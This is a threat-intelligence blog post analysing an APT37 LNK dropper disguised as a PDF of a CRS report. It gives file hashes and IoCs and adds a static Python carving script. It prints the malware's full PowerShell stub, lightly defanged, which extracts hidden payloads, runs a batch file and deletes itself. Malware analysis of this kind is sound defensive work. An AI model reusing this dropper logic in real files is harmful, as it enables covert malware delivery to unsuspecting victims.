
Malware created by the North Korean APT group Reaper (APT37): 동북공정(미국의회조사국(CRS Report).pdf.lnk (2024.4.3)

2025-01-01, Sakai
https://wezard4u.tistory.com/429370
#APT37 #LNK

Contents

Today I am writing about 동북공정(미국의회조사국(CRS Report).pdf.lnk (2024.4.3), a piece of malware created by the North Korean APT group Reaper (APT37), which is well known worldwide.
Hashes of the malware
File name: 동북공정(미국의회조사국(CRS Report).pdf.lnk ("Northeast Project (U.S. Congressional Research Service (CRS Report))", with a .pdf.lnk double extension)
Size: 58,894,509 bytes
MD5:358122718ba11b3e8bb56340dbe94f51
SHA-1:0c61effe0c06d57835ead4a574dde992515b9382
SHA-256:b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
The command line embedded in the LNK (the cmd.exe /k arguments that locate powershell.exe and launch the PowerShell stub), as dumped from its StringData. The parentheses inside tokens such as fo(r), (t)okens and rshell(.)exe defang the listing; read each token as if the parentheses were removed.
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k fo(r) /f "(t)okens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\(v)1.0\*rshell(.)exe /s /b /od') do call %a "
    $dirPath = Ge(t)-Location;
    if($di(r)Path -Match 'Syst(e)m32' -or $dir(P)ath -Match 'Program Files') {$dir(P)ath = '%tem(p)%'};
    $lnkPa(t)h = Get-Chil(d)Item -Path $dirPath -Recurse *(.)lnk | where-object {$_.leng(t)h -eq 0x03(8)2A8AD} | Select-Object -ExpandProperty FullName;
    $lnkFile=New-Object Syste(m).IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]::Read);
    $lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);
    $pdfFile=N(e)w-Object byte[] 0x004B4DD3;
    $lnkFile.Read($pdfFile, 0, 0x004B(4)DD3);
    $pdfPath = $lnkPath.replace('.lnk','.pdf');
    sc $pdfPath $pd(f)File -Encoding Byte;
    & $pdfPath;
    $lnkFile.Seek(0x00(4)B5E63,[System.IO.SeekOrigin]::Begin);
    $exeFile=New-Object byte[] 0x000D9402;
    $lnkFile.Rea(d)($exeFile, 0, 0x000D9402);
    $exePath=$env:publi(c)+'\'+'panic(.)dat';
    sc $exePath $exeFile -Encoding Byte;
    $lnkFile(.)Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);
    $stringByte = New-Object byte[] 0x000005A(9);
    $lnkFile.Read($stringByte, 0, 0x00(0)005A9);
    $batStrPath = $env:temp+'\'+'para(.)dat';
    $string = [System.Text.Encoding](:):UT(F)8.GetString($stringByte);
    $string | Out-File -FilePath $batStrPath -Encoding ascii;
    $lnkFile.Seek(0x0058F80E, [System.IO.SeekOrigin]::Begin);
    $batByte = New-Object byte[] 0x00000135;
    $lnkFile.Read($batByte, 0, 0x00000135);
    $executePath = $env:temp+'\'+'price.bat';
    Write-Host $executePath;
    Write-Host $batStrPath;
    $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);
    $bastString | Out-File -FilePath $executePath -(E)ncoding ascii;
    & $executePath;
    $lnkFile.Close();
    remove-item -path $lnkPath -force;
"&& exit
iconlocation: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
}
Malware analysis
1. Locating PowerShell with the dir command
The dir command searches C:\Windows\SysWow64\WindowsPowerShell\v1.0\ for files matching *rshell.exe (i.e. powershell.exe): /s recurses into subdirectories, /b prints bare paths, /od sorts by date. Each path the for /f loop reads is placed in %a, and call %a "..." launches that PowerShell with the stub as its argument. …
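The stub above makes the LNK its own container: it finds itself on disk by exact size, then carves a decoy PDF, an executable (panic.dat), a text file (para.dat) and a batch file (price.bat) from fixed offsets before running the batch file and deleting the LNK. The following Python script is added here as an example; it is not part of the original post or of the malware. It pulls the Seek offsets and buffer lengths out of the stub text, checks that the four segments are contiguous and fit the file, and carves them without executing anything. The offsets, lengths, the 0x0382A8AD size filter and the dropped file names are the constants from the listing above; the sample buffer, the function names and the magic-byte `classify` heuristic are this example's own assumptions.

```python
"""Carve the payloads that the APT37 LNK stub reads out of its own file.

Added example, not the malware's or the original post's code. Offsets, lengths,
the 0x0382A8AD size filter and the dropped file names are the constants from
the commandlinearguments listing above; everything else is this example's own.
"""
from __future__ import annotations

import re

# Size the stub's where-object filter looks for when locating itself on disk
# ($_.length -eq 0x0382A8AD == 58,894,509 bytes, the LNK's reported size).
EXPECTED_LNK_SIZE = 0x0382A8AD

# Where each carved segment is written, in stub order (the first one is the
# decoy PDF, named by replacing ".lnk" with ".pdf" in the LNK's own path).
DROP_NAMES = ["<lnk name>.pdf", "%PUBLIC%\\panic.dat", "%TEMP%\\para.dat", "%TEMP%\\price.bat"]

# The stub's Seek / New-Object byte[] template, reproduced from the listing
# above with the defanging parentheses removed so the constants can be parsed.
STUB_FRAGMENT = (
    "$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;"
    "$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;"
    "$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;"
    "$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;"
)

SEEK_RE = re.compile(r"\.Seek\((0x[0-9A-Fa-f]+)")
SIZE_RE = re.compile(r"New-Object byte\[\]\s*(0x[0-9A-Fa-f]+)")


def parse_segments(stub: str) -> list[tuple[int, int]]:
    """Return (offset, length) pairs from a stub that follows this Seek/Read template."""
    offsets = [int(h, 16) for h in SEEK_RE.findall(stub)]
    lengths = [int(h, 16) for h in SIZE_RE.findall(stub)]
    if len(offsets) != len(lengths):
        raise ValueError(f"{len(offsets)} Seek() calls but {len(lengths)} buffers")
    return list(zip(offsets, lengths))


def check_contiguous(segments: list[tuple[int, int]]) -> int:
    """Verify each segment starts where the previous one ends; return the end offset."""
    pos = None
    for offset, length in segments:
        if pos is not None and offset != pos:
            raise ValueError(f"segment at 0x{offset:X} does not follow 0x{pos:X}")
        pos = offset + length
    return pos


def unreferenced_tail(file_size: int, segments: list[tuple[int, int]]) -> int:
    """Bytes after the last carved segment that the stub never reads."""
    return file_size - check_contiguous(segments)


def classify(data: bytes) -> str:
    """Cheap magic-byte triage of a carved segment (example heuristic)."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith(b"MZ"):
        return "pe"
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text"


def carve(lnk: bytes, segments, expected_size: int | None = None) -> list[dict]:
    """Cut the segments out of the LNK bytes; refuse files that are not the expected size."""
    if expected_size is not None and len(lnk) != expected_size:
        raise ValueError(f"size {len(lnk)} != expected {expected_size}; the stub would not find itself")
    parts = []
    for name, (offset, length) in zip(DROP_NAMES, segments):
        if offset + length > len(lnk):
            raise ValueError(f"{name}: 0x{offset:X}+0x{length:X} runs past end of file")
        chunk = lnk[offset:offset + length]
        parts.append({"name": name, "offset": offset, "length": length,
                      "kind": classify(chunk), "data": chunk})
    return parts


def build_sample(segments) -> bytes:
    """Constructed stand-in for the real LNK: same layout, marker bytes instead of payloads."""
    buf = bytearray(check_contiguous(segments))
    markers = [b"%PDF-1.7\n", b"MZ", b"set SRV=example\r\n", b"@echo off\r\n"]  # constructed
    for (offset, _), marker in zip(segments, markers):
        buf[offset:offset + len(marker)] = marker
    return bytes(buf)


if __name__ == "__main__":
    segs = parse_segments(STUB_FRAGMENT)
    print(f"carved region ends at 0x{check_contiguous(segs):X}; "
          f"{unreferenced_tail(EXPECTED_LNK_SIZE, segs):,} bytes of the real file are never read")
    for part in carve(build_sample(segs), segs):
        print(f"{part['name']:<20} off=0x{part['offset']:08X} len=0x{part['length']:08X} {part['kind']}")
```

Against the real sample, call `carve(open(path, "rb").read(), segs, expected_size=EXPECTED_LNK_SIZE)` and write each `data` field to disk for separate analysis. Two points the arithmetic makes visible: the four Seek offsets are exactly contiguous (each starts where the previous read ends, so the carving ends at 0x58F943), and the roughly 53 MB between that point and the 58,894,509-byte file size is never read by the stub. Note also that para.dat and price.bat are decoded as UTF-8 and rewritten with Out-File -Encoding ascii, so what lands on disk is an ASCII re-encoding rather than the raw carved bytes.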

IoC

358122718ba11b3e8bb56340dbe94f51
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
0c61effe0c06d57835ead4a574dde992515b9382